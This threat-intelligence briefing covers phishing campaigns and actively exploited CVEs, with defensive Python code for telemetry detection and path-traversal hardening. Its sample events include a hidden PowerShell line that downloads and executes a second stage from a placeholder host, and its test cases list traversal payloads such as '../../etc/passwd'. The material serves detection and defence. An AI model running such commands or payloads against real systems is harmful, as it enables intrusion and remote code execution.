Daily Threat Briefing

Cyware Daily Threat Intelligence, January 26, 2026


North Korean hackers are using AI to sharpen their social engineering. The Konni group’s "Operation Poseidon" targets blockchain developers in Japan, Australia, and India with AI-generated PowerShell malware. Disguised as financial notices, the campaign deploys the EndRAT backdoor through malicious shortcuts.

Russian businesses are facing a dual-threat assault that combines espionage with extortion. A new campaign uses deceptive documents to distract users while silently installing Amnesia RAT and ransomware. By hosting payloads on public cloud services to evade detection, the campaign steals sensitive browser and crypto data before locking the system and demanding payment.

CISA has added four high-severity vulnerabilities to its KEV catalog. With attackers also targeting flaws in Vite, Versa, Prettier, and Zimbra, organizations are urged to patch immediately to prevent unauthorized administrative access and file exposure.

Top Malware Reported in the Last 24 Hours

Konni deploys AI-generated PowerShell malware

North Korean hacking group Konni has been observed using AI-generated PowerShell malware to target blockchain developers in Japan, Australia, and India. This phishing campaign, known as Operation Poseidon, exploits social engineering techniques, employing malicious emails disguised as financial notices to trick recipients into downloading harmful ZIP files. These files contain a Windows shortcut that executes an embedded PowerShell loader, leading to the deployment of a backdoor known as EndRAT. The malware is designed to evade detection and establish persistence on infected systems, allowing attackers to gain broader access to development environments.

Multi-stage phishing campaign targets Russia

A multi-stage phishing campaign has been identified targeting users in Russia, utilizing ransomware and Amnesia RAT. The attack begins with social engineering tactics, presenting seemingly benign business documents that distract victims while malicious activities occur in the background. The campaign effectively employs public cloud services for payload distribution, complicating detection and takedown efforts. Malicious scripts are delivered through compressed archives containing deceptive documents and Windows shortcuts, which, when executed, initiate a series of PowerShell commands to download additional payloads. The final stages include deploying Amnesia RAT for extensive data theft and a ransomware variant that encrypts files and manipulates cryptocurrency transactions.
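Both campaigns above share one delivery chain: a compressed archive, a Windows shortcut inside it, and a PowerShell stage that is launched from that shortcut and pulls further payloads from the network. The following is an added illustration of how a defender can score process-creation telemetry for that chain; it is not code from the briefing, from Cyware, or from any of the referenced reports. It assumes Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine, CurrentDirectory), and every event, path and URL in it is constructed for the example.

```python
import re

# Constructed sample events in a Sysmon Event ID 1 style shape (assumption: field names
# Image / ParentImage / CommandLine / CurrentDirectory). None of these are real log lines.
SAMPLE_EVENTS = [
    {   # benign: a developer double-clicks a shortcut to a local build script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\Users\dev\scripts\build.ps1",
        "CurrentDirectory": r"C:\Users\dev\scripts",
    },
    {   # lure-shaped: a shortcut opened straight from a ZIP spawns a hidden PowerShell that fetches a second stage
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\"",
        "CurrentDirectory": r"C:\Users\dev\AppData\Local\Temp\Temp1_Financial_Notice.zip",
    },
    {   # noisy but not suspicious: cmd.exe listing a temp folder
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd.exe /c dir",
        "CurrentDirectory": r"C:\Users\dev\AppData\Local\Temp",
    },
]

# Script hosts that a double-clicked shortcut commonly launches via explorer.exe
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line primitives used to pull a second stage from the network
DOWNLOAD_PRIMITIVES = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile"
    r"|Net\.WebClient|Start-BitsTransfer|\bcurl\b",
    re.IGNORECASE,
)

# Flags that hide the window, skip profiles, bypass policy or carry an encoded command
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-e(?:xecutionpolicy|p)\s+bypass|FromBase64String",
    re.IGNORECASE,
)

# Working directory of a shortcut run from inside an archive opened by Explorer (Temp1_<name>.zip)
# or from the user's temp folder
ARCHIVE_OR_TEMP = re.compile(
    r"\\Temp\d*_[^\\]+\.(?:zip|rar|7z)(?:\\|$)|\\AppData\\Local\\Temp(?:\\|$)",
    re.IGNORECASE,
)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of rule names the event triggers, in a fixed order."""
    hits = []
    if _basename(ev["Image"]) in SHELL_HOSTS and _basename(ev["ParentImage"]) == "explorer.exe":
        hits.append("shell_from_explorer")
    cmd = ev.get("CommandLine", "")
    if DOWNLOAD_PRIMITIVES.search(cmd):
        hits.append("download_primitive")
    if EVASION_FLAGS.search(cmd):
        hits.append("evasion_flags")
    if ARCHIVE_OR_TEMP.search(ev.get("CurrentDirectory", "")) or ARCHIVE_OR_TEMP.search(cmd):
        hits.append("archive_or_temp_location")
    return hits


def is_suspicious(hits):
    # A shell under explorer.exe or a temp-folder cwd alone is everyday noise; alert only when
    # a payload-fetching or evasion indicator is combined with at least one contextual signal.
    return len(hits) >= 2 and bool({"download_primitive", "evasion_flags"} & set(hits))


def triage(events):
    """Return (index, hits) for every event that crosses the alert threshold."""
    alerts = []
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if is_suspicious(hits):
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}\n  rules: {', '.join(hits)}")
```

The threshold in `is_suspicious` is the tuning point: the third event (a shell listing a temp folder) trips two contextual rules yet stays below the bar, while the lure-shaped event trips all four. The working-directory rule keys on the `Temp1_<archive>.zip` folder that Explorer creates when a user opens a shortcut directly from a ZIP, which is exactly the situation both campaigns rely on.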

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds VMware vCenter bug to KEV catalog

CISA has added a critical vulnerability, CVE-2024-37079, affecting VMware vCenter Server to its KEV catalog due to evidence of active exploitation. This heap overflow vulnerability in vCenter's DCE/RPC protocol implementation allows attackers with network access to execute remote code by sending specially crafted packets. This flaw is part of a set of four vulnerabilities, including another heap overflow and a privilege escalation issue. Although the specific details of the exploitation and the responsible threat actors remain unclear, Broadcom has confirmed that CVE-2024-37079 is being actively exploited in the wild.

CISA confirms exploitation of four software vulnerabilities

CISA has confirmed the active exploitation of four vulnerabilities affecting enterprise software from Versa, Zimbra, Vite, and Prettier. Among these, CVE-2025-31125 is a high-severity improper access control issue in Vite that can expose sensitive files. CVE-2025-34026 is a critical authentication bypass in the Versa Concerto SD-WAN platform, resulting from a misconfigured Traefik reverse proxy, which allows unauthorized access to administrative endpoints. Additionally, CVE-2025-54313 involves a supply-chain compromise in the eslint-config-prettier package, where hackers embedded malicious code in popular JavaScript libraries. Lastly, CVE-2025-68645 is a local file inclusion vulnerability in Zimbra's Webmail Classic UI, enabling attackers to exploit user-supplied parameters to access arbitrary files. CISA has added these vulnerabilities to its KEV catalog, indicating their active exploitation in the wild.
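The Zimbra entry above is a local file inclusion flaw in which a user-supplied parameter is turned into a file path. The following is an added, generic illustration of that defect class and its fix; it is not Zimbra's code and does not reproduce the actual bug. `unsafe_resolve` shows the vulnerable pattern (joining the parameter onto a document root with no containment check), and `is_contained` / `safe_resolve` show a resolver that normalises the path and verifies it stays under the root. The base directory `/srv/app/templates` and the parameter values are constructed for the example.

```python
import os


def unsafe_resolve(base_dir, user_path):
    """Vulnerable pattern: the request parameter is joined onto the document root with no
    containment check. "../" components walk out of base_dir, and an absolute user_path makes
    os.path.join discard base_dir altogether."""
    return os.path.join(base_dir, user_path)


def is_contained(base_dir, user_path):
    """True only if user_path, resolved against base_dir, still lies inside base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares whole path components, so "/srv/app/templates_evil/x" is correctly
    # rejected for base "/srv/app/templates"; a plain startswith() check would accept it.
    return os.path.commonpath([base, candidate]) == base


def safe_resolve(base_dir, user_path):
    """Hardened resolver: reject anything that escapes the root, otherwise return the real path."""
    if not is_contained(base_dir, user_path):
        raise ValueError("requested path escapes the allowed directory")
    return os.path.realpath(os.path.join(os.path.realpath(base_dir), user_path))


# Constructed parameter values (not from the advisory) with the containment verdict each should get
TRAVERSAL_CASES = {
    "index.html": True,
    "reports/2026-01.html": True,
    "../../etc/passwd": False,          # classic relative traversal
    "/etc/passwd": False,               # absolute path: os.path.join drops the root
    "../templates_evil/index.html": False,  # sibling directory sharing the root's prefix
    "..": False,                        # the parent of the root itself
}


def evaluate_cases(base_dir="/srv/app/templates"):
    """Run every constructed parameter through the hardened check."""
    return {p: is_contained(base_dir, p) for p in TRAVERSAL_CASES}


def unsafe_escapes(base_dir="/srv/app/templates", user_path="../../etc/passwd"):
    """True when the vulnerable join, once normalised, points outside base_dir."""
    resolved = os.path.normpath(unsafe_resolve(base_dir, user_path))
    return not resolved.startswith(base_dir + os.sep)


if __name__ == "__main__":
    for param, verdict in evaluate_cases().items():
        print(f"{param!r:36} contained={verdict}")
    print("vulnerable join escapes root:", unsafe_escapes())
```

The check must run on the fully decoded parameter (after URL decoding and any application-level unescaping), since a containment test applied before decoding can be bypassed by encoded traversal sequences. Pairing the resolver with an allowlist of permitted file names or extensions further narrows what a request can reach even inside the root.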
